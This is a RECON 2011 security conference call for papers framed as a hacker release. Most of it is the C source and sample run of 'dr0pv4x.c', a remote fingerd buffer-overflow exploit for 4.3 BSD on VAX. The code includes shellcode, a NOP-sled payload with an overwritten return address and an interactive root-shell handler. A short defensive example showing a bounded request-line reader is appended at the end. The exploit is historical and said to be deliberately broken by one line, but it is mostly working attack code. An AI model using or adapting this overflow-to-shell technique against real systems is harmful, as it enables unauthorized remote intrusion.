
RECON 2011 Call For Papers – RECON is a security conference taking place in downtown Montreal from July 8th through the 10th.

,/*
+ + + +
+ + +
+ +
\ /
+ _ - _+_ - ,__
_=. .:. /=\ _|===|_ ||::|
| | _|. | | | | | | __===_ -=- ||::|
|==| | | __ |.:.| /\| |:. | | | | .|| : |||::|
| |- |.:|_|. :__ |.: |--|==| | .| |_ | ' |. ||. |||:.|
__|. | |_|. | |.|...||---| |==| | | | |_--. || |||. |
| | | |. | | |::.||: .| |==| | . : |=|===| :|| . ||| .|
|:.| .| | | | |:.:|| . | |==| | |=|===| . |' | | |
| | | | |' : . | ; ; ' |
' : ` : ' . ' . . :
' . R E C O N 2 0 1 1 .
` . . '
. C F P

0000000 REC0N 2011 (http://recon.cx)
0000020 JULY 8-10
0000040 HYATT REGENCY (New venue)
0000060 M0NTREAL
0000100
0000120 + REC0N 2011
0000140 - Conference and training
0000160 - No censorship, no sales pitches
0000200 - Videos from 2010 are coming online
0000220
0000240 + Now accepting submissions
0000260 - Single track
0000300 - 60 & 30 minute time slots
0000320 - Lightning talks at the party
0000340
0000360 + Primary topics
0000400 - Reverse engineering and/or exploitation:
0000420 + Software
0000440 - Malware
0000460 - Protection/DRM
0000500 - Anti-reversing
0000520 - Static/runtime analysis
0000540 + Hardware
0000560 - Embedded devices, consoles, femtocell
0000600 - Cellphones
0000620 - RFID, SDR (software defined radio)
0000640 - Side channel attacks
0000660 - Physical security (cameras, access control)
0000700 + Protocol
0000720 - GSM / CDMA
0000740
0000760 + Also of interest to us
0001000 - Privacy
0001020 + Anti-censorship
0001040 + Anti-surveillance
0001060 + Anonymity
0001100 + Counter-forensics
0001120
0001140 + Anything else elite
0001160
0001200 + Please include
0001220 - Short summary
0001240 - Name or alias
0001260 - Contact information
0001300 - Bio
0001320
0001340 + Important dates
0001360 - Training/conference registration opens March 20, 2011
0001400 - First round of selections: April 10, 2011
0001420 - CFP closes May 15, 2011
0001440
0001460 + Send submissions to
0001500 - cfp2011 @ recon.cx
0001520
0001540 + Speaker / attendee privacy
0001560 - Recon does not require speakers use their real names
0001600 - Recon does not provide attendee or speaker information to third-parties
0001620 (except where necessary for registration/payment)

* w0rd, n0w ph0r th3 g00dz..
* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC]
*
* dr0pv4x.c
* t0p-s3kR1t w4r3z k0m1n' @ ya
* str8 fr0m the k0d3l1n3
* -th3 phr3zh pr1nc3 0f b3llk0r3

* w8, b4 i ph0rg3t, 3t3rn4l sh0utz 2:

route/daemon9, sw_r, Phiber Optik, Mendax, The Last Stage of Delirium (sup guys), 8lgm,
klog[ADM], luvz2chat, netl1nk, l0r3nz0, dmk, root@vax.recon.cx (lol), SN, Fravia, Mammon_,
m1x, madruquz, xmux, the current maintainer of the sexchart, so1o*, newsham, lcamtuf, Ilfak,
archive.org, m4tr1x, u4ea, Acid Phreak, ACiD BuRN, Bi-Curious George, hypatia, tdz, Lady Gaga,
Lindsay Lohan, gov-boi, jennicide, netw1z, Johnny Lee Miller, pluvius, rtm, das_modem, imm,
w1z4rd, l0renz, Subgraph & The Future Crew

* a1ght, s0 ch3k1t, jU$t f0ll0w th3z3 E-Z st3pz

* st3p 1: c0mp1l3

* st3p 2: cl0z3 uR 3y3z & r3c1t3 th3 ph0ll0w1ng s4kr3d m4ntr4

OLD WAREZ = NO WAREZ ;)

* st3p 3: ./dr0pv4x [target] offset

+ pr3st0 +

$ ./dropvax X.X.X.X -12345
[+] ATDT X.X.X.X
[+] CONNECT 9600
[+] Return address: 0xUWISH
[*] Compiled for little-endian arch.
[+] Sent payload...
[+] Shell!
4.3 BSD UNIX #3: Sat Feb 14 20:31:03 PST 2004
16:56 up 6:08, 1 user, load average: 0.09, 0.06, 0.03
User tty from login@ idle JCPU PCPU what
root co 10:49 1 -sh -if
whoami:
root
Warning: no access to tty; thus no job control in this shell...
# exit

k p8ce 0ut,
- dj j4zzy 3fn3t & th3 phr3zh pr1nc3 0f b3llk0r3

Responsible Disclosure:

++w3 h4v3 p3r$0n4lly br0k3n th1$ expl01t 1n a w4y th4t 1z m0r3-th4n-s1mpl3 t0
f1x (1 br0k3n l1n3) w1th th3 1nph0rm4t10n pr0v1d3d 1n th3 k0MM3ntz++

* [DeC] DO NOT DISTRIBUTE PRIVATE !!! [DeC] *
(research purposes only!!!)
*/

#include <stdio.h>
#include <stdlib.h>     /* exit(3), atoi(3) */
#include <stdint.h>     /* uint32_t */
#include <string.h>     /* strlen(3) */
#include <strings.h>    /* bcopy(3) */
#include <unistd.h>     /* read(2), write(2), sleep(3) */
#include <signal.h>
#include <errno.h>
#include <ctype.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/wait.h>
#include <sys/file.h>
#include <sys/stat.h>
#include <sys/select.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef BIG_ENDIAN_ARCH

#define bswap(value) \
(((u32) (value)) << 24 |\
(((u32) (value)) & 0x0000FF00) << 8 |\
(((u32) (value)) & 0x00FF0000) >> 8 |\
((u32) (value)) >> 24)

#else

#define bswap(value) (value)

#endif

extern int errno;

int try_finger(char *, int);
void fdsh(int);

typedef uint32_t u32;

#ifndef USE_ALTERNATE_SHELLCODE /* VAX-11 shellcode w/ explanation */

/* execve("/bin/sh", NULL, NULL) -
Take advantage of the 4.3 BSD UNIX VM.
It always puts the process entry point (_start) at address 0x00000000.
This gives us valid memory (a zero-byte string, since the first two bytes
of procedures like _start on VAX (those called with "callg" instr.) are
the saved register-mask, and in _start's case this is zero (does not matter).
Furthermore, this line in kern_exec.c checks if:

if (ap == NULL && uap->envp) {
uap->argp = NULL;
...
}

So we don't need a valid argv at address zero.
See the VAX Architecture Reference Manual (VARM) or the
VAX Architecture Handbook.

http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy
of the internal version of the VARM,
which will help explain the stack frame and the instruction set.
*/

unsigned char shellcode[] =
"\021\017" /* brb shellcode+0x11 (PC-relative) */
"\272\001" /* popr $0x1 (this is a mask: pop one word into r0) */
"\335\000\335\000" /* pushl $0 ; pushl $0 */
"\335P" /* pushl %r0 (address of /bin/sh string) */
"\335\003" /* pushl $0x3 */
"\320^\\" /* movl %sp, %ap */
"\274;" /* chmk $0x3b (change mode to kernel, 0x3b = execve) */
"\026\357\353" /* jsb shellcode+0x4 (PC-relative) */
"\377\377\377"
"/bin/sh"; /* .asciz "/bin/sh" */

#else /* USE_ALTERNATE_SHELLCODE */ /* RTMorris Internet Worm (1988) */

/* If you think the shellcode is the problem, try this one. */

u32 shellcode[] =
{
bswap(0x732f8fdd),
bswap(0x8fdd0068),
bswap(0x6e69622f),
bswap(0xdd5a5ed0),
bswap(0xdd00dd00),
bswap(0xd003dd5a),
bswap(0x3bbc5c5e)
};

#endif

#define Send(str) send(sock, (str), strlen(str), 0)

void fdsh(int sock)
{
printf("[+] Sent payload...\n");

sleep(1);
Send("echo '[+] Shell!'; PATH=$PATH:/etc:/bin:/usr/bin:/usr/ucb:/usr/new:/usr/old\n");
Send("export PATH\n");
Send("strings /vmunix | fgrep UNIX\n");
Send("w ; echo whoami: ; whoami; exec csh -if\n");

for (;;) {
fd_set fds;
char buf[2048];
int nb;

FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
if (select(sock + 1, &fds, NULL, NULL, NULL) < 0) {
perror("select");
return;
}
if (FD_ISSET(0, &fds)) {
nb = read(0, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
}
send(sock, buf, nb, 0);
}
if (FD_ISSET(sock, &fds)) {
nb = read(sock, buf, sizeof(buf));
if (nb <= 0) {
perror("read(2)");
return;
}
write(1, buf, nb);
}
}
}

/* This routine exploits a fixed 512 byte input buffer in a VAX running
 * the BSD 4.3 fingerd binary. It sends 536 bytes (plus a newline) to
 * overwrite six extra words in the stack frame, including the return
 * PC, to point into the middle of the string sent over. The instructions
 * in the string do the direct system call version of execve("/bin/sh"). */

/* From sp4f ^^^^^^^ (lolololol) */

/*
 * Here's what the VAX-11 stack frame looks like (from 4.3 BSD's <vax/frame.h>):
*/
#if 0
struct frame {
int fr_handler;
u_int fr_psw:16, /* saved psw */
fr_mask:12, /* register save mask */
:1,
fr_s:1, /* call was a calls, not callg */
fr_spa:2; /* stack pointer alignment */
int fr_savap; /* saved arg pointer */
int fr_savfp; /* saved frame pointer */
int fr_savpc; /* saved program counter */
};
#endif

int try_finger(char *host, int offset)
{
int s, i;
struct sockaddr_in sin = { 0 };
u32 retaddr = 0x7fffe8a8 - offset;
char buf[536];

sin.sin_family = PF_INET;
sin.sin_port = htons(79);
sin.sin_addr.s_addr = inet_addr(host);

if (sin.sin_addr.s_addr == -1) {
struct hostent *h;
h = gethostbyname(host);
if (h == NULL) {
herror("gethostbyname(3)");
return -1;
}
bcopy(h->h_addr, &sin.sin_addr, sizeof(u32));
}

if ((s = socket(sin.sin_family, SOCK_STREAM, 0)) < 0) {
perror("socket(2)");
return -1;
}

printf("[+] ATDT %s\n", inet_ntoa(sin.sin_addr));

if (connect(s, (void *)&sin, sizeof(sin)) < 0){
perror("connect(2)");
printf("[-] NO DIALTONE\n");
return -1;
}

printf("[+] CONNECT 9600\n");

for (i = 0; i < 400; i++)
buf[i] = '\001'; /* VAX-11 NOP */

bcopy(shellcode, buf + 400, sizeof(shellcode));

for (i = 400 + sizeof(shellcode); i < sizeof(buf); i++)
buf[i] = '\0'; /* VAX-11 HALT, try not to land on one. */

printf("[+] Return address: %#x\n", retaddr);

#ifdef BIG_ENDIAN_ARCH
printf("[*] Compiled for big-endian arch.\n");
#else
printf("[*] Compiled for little-endian arch.\n");
#endif

*((u32 *)buf + 128) = bswap(0x7fffeab0);
*((u32 *)buf + 129) = bswap(0x7fffeb60);
*((u32 *)buf + 130) = bswap(0x20000000);
*((u32 *)buf + 131) = bswap(0x7fffeb64);
*((u32 *)buf + 132) = bswap(retaddr);
*((u32 *)buf + 133) = 0;

send(s, buf, sizeof(buf), 0); /* sizeof (buf) == 536 */
send(s, "\n", 1, 0);

fdsh(s);
printf("[-] NO CARRIER\n");
return 0;
}

int main(int c, char **v)
{
char *host = v[1], *ofs = v[2];

if (!*(++v)) {
fprintf(stderr, "usage: %s hostname [offset]\n", *(--v));
exit(1);
}

if (c > 2)
try_finger(host, atoi(ofs));
else
try_finger(host, 0);

exit(0);
}
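The try_finger() comment above describes the bug as a fixed 512-byte input buffer that a 536-byte request overruns by six words. The following is an added example, not part of the page or of dr0pv4x.c: the bounded request-line read that removes that defect, plus the arithmetic behind the "six extra words"; REQ_BUF, the function names and the constructed inputs are the example's own assumptions.

```c
#include <stdio.h>
#include <string.h>

#define REQ_BUF 512   /* the fixed buffer size the try_finger() comment names */

/* Copy one newline-terminated request line from src (src_len bytes, e.g. what
 * recv() returned) into dst (dst_size bytes including the NUL). Returns the
 * line length, or -1 when no newline falls within dst_size bytes: an oversize
 * request is refused instead of running past dst into the stack frame. */
int read_request_line(const unsigned char *src, size_t src_len,
                      char *dst, size_t dst_size)
{
    size_t limit = src_len < dst_size ? src_len : dst_size, i;
    for (i = 0; i < limit; i++) {
        if (src[i] == '\n') {   /* i bytes plus NUL fit, since i < dst_size */
            memcpy(dst, src, i);
            dst[i] = '\0';
            return (int)i;
        }
    }
    if (dst_size > 0)
        dst[0] = '\0';          /* refused: leave dst empty, not half-filled */
    return -1;
}

/* 4-byte words a req_len-byte request reaches past a REQ_BUF-byte buffer
 * (0 when it fits); 536 bytes gives the "six extra words" the comment counts. */
int words_past_buffer(size_t req_len)
{
    return req_len <= REQ_BUF ? 0 : (int)((req_len - REQ_BUF + 3) / 4);
}

/* Run the bounded reader over one request with a REQ_BUF-sized line buffer. */
int accept_request(const unsigned char *src, size_t src_len)
{
    char line[REQ_BUF];
    return read_request_line(src, src_len, line, sizeof line);
}

int main(void)
{
    unsigned char ok[] = "alice\n"; /* constructed: an ordinary finger query */
    unsigned char big[537];         /* constructed: 536 x 0x01 then '\n', as try_finger() sends */
    memset(big, 0x01, 536);
    big[536] = '\n';
    printf("short request -> %d\n", accept_request(ok, sizeof ok - 1));
    printf("536-byte request -> %d (%d words past the buffer)\n",
           accept_request(big, sizeof big), words_past_buffer(536));
    return 0;
}
```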
